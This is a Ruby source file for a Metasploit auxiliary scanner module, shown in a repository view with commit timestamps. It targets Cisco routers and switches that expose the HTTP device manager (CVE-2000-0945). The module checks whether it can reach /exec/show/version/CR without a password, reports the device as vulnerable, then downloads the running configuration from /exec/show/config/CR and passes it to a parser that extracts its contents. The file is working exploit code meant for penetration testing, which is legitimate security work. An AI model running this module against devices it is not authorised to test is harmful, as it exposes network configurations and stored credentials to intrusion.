metasploit-framework/modules/auxiliary/scanner/http/cisco_device_manager.rb

98 lines
2.5 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
2011-11-20 02:12:07 +00:00
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
2011-11-20 02:12:07 +00:00
# Include Cisco utility methods
include Msf::Auxiliary::Cisco
2011-11-20 02:12:07 +00:00
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
2011-11-20 02:12:07 +00:00
authentication.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '1846'],
[ 'CVE', '2000-0945'],
[ 'OSVDB', '444'],
],
'DisclosureDate' => 'Oct 26 2000'))
end
def run_host(ip)
2011-11-20 02:12:07 +00:00
res = send_request_cgi({
'uri' => "/exec/show/version/CR",
'method' => 'GET'
}, 20)
if res and res.code == 401
print_error("#{rhost}:#{rport} Failed to authenticate to this device")
return
end
if res and res.code != 200
print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")
return
end
2011-11-20 02:12:07 +00:00
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
2011-11-20 02:12:07 +00:00
# Report a vulnerability only if no password was specified
if datastore['BasicAuthPass'].to_s.length == 0
report_vuln(
{
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => self.name,
:info => "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/exec/show/version/CR",
:refs => self.references,
:exploited_at => Time.now.utc
}
)
end
2011-11-20 02:12:07 +00:00
res = send_request_cgi({
'uri' => "/exec/show/config/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)/mi
config = $2.gsub(/<\/[A-Z].*/i, '').strip
print_good("#{rhost}:#{rport} Processing the configuration file...")
cisco_ios_config_eater(rhost, rport, config)
else
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
end
2011-11-20 02:12:07 +00:00
end
2011-11-20 02:12:07 +00:00
end
end